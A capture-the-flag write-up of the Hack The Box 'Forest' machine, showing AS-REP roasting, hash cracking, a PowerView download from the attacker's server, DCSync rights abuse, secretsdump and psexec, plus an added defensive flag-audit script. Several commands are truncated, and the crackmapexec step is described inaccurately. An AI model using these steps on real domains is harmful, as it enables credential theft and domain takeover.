HTB Forest




A Domain Controller for the htb.local domain is found.



Found a service account.

Let’s test for users that do not require Kerberos pre-authentication.

Create a user list with the found users.

Start up kerbrute.

User accounts that are enabled and do not require pre-authentication are vulnerable to an AS-REP Roasting attack.
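The exposure described above is visible in the account’s userAccountControl attribute. The following added example (not part of the original writeup) decodes that bitmask over constructed sample records, lists the accounts a defender should remediate, and shows the corrected flag value; the account names and values are made up.

```python
"""Audit userAccountControl for accounts exposed to AS-REP roasting."""
from dataclasses import dataclass

# Subset of the documented userAccountControl bits (ADS_USER_FLAG values).
FLAGS = {
    0x000002: "ACCOUNTDISABLE",
    0x000200: "NORMAL_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWD",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x000002
DONT_REQ_PREAUTH = 0x400000


@dataclass
class Account:
    sam_account_name: str
    user_account_control: int


# Constructed sample records, shaped like an LDAP export (not real data).
SAMPLE_ACCOUNTS = [
    Account("svc-alfresco", 0x410200),  # enabled, pre-auth not required
    Account("andy", 0x010200),          # enabled, pre-auth required
    Account("old-svc", 0x400202),       # pre-auth not required but disabled
]


def decode_flags(uac: int) -> list[str]:
    """Return the names of the known bits set in a userAccountControl value."""
    return [name for bit, name in sorted(FLAGS.items()) if uac & bit]


def is_enabled(acct: Account) -> bool:
    return not acct.user_account_control & ACCOUNTDISABLE


def preauth_not_required(acct: Account) -> bool:
    return bool(acct.user_account_control & DONT_REQ_PREAUTH)


def asrep_exposed(accounts: list[Account]) -> list[str]:
    """Enabled accounts whose AS-REP can be requested without pre-authentication."""
    return sorted(a.sam_account_name for a in accounts
                  if is_enabled(a) and preauth_not_required(a))


def clear_preauth_flag(uac: int) -> int:
    """The remediated userAccountControl value: pre-authentication required again."""
    return uac & ~DONT_REQ_PREAUTH


if __name__ == "__main__":
    for name in asrep_exposed(SAMPLE_ACCOUNTS):
        print(f"{name}: requires remediation")
```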

Use the Impacket GetNPUsers.py script from here.

Run the Python script to dump the hash.

./GetNPUsers.py htb.local/svc-alfresco -no-pass -dc-ip

Use John to crack the hash.

Use evil-winrm to gain access.

First flag is found.

Use the BloodHound Python ingestor to collect JSON data for the BloodHound app.

Load the data into BloodHound and look at the svc-alfresco node.

The node belongs to the Account Operators group.

The Account Operators group is allowed to create and modify users and add them to non-protected groups.

Download the PowerSploit dev module from GitHub and start a Python web server to transfer the PowerView script to the Windows box.

powershell Invoke-WebRequest -Uri -OutFile PowerView.ps1

Input the following commands:

$pass = convertto-securestring 'password' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential ('HTB\persecure', $pass)

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity persecure -

Use secretsdump.py to get the hashes.

Crack the hash with crackmapexec.

Use psexec.py to gain a shell.

Root flag is found.
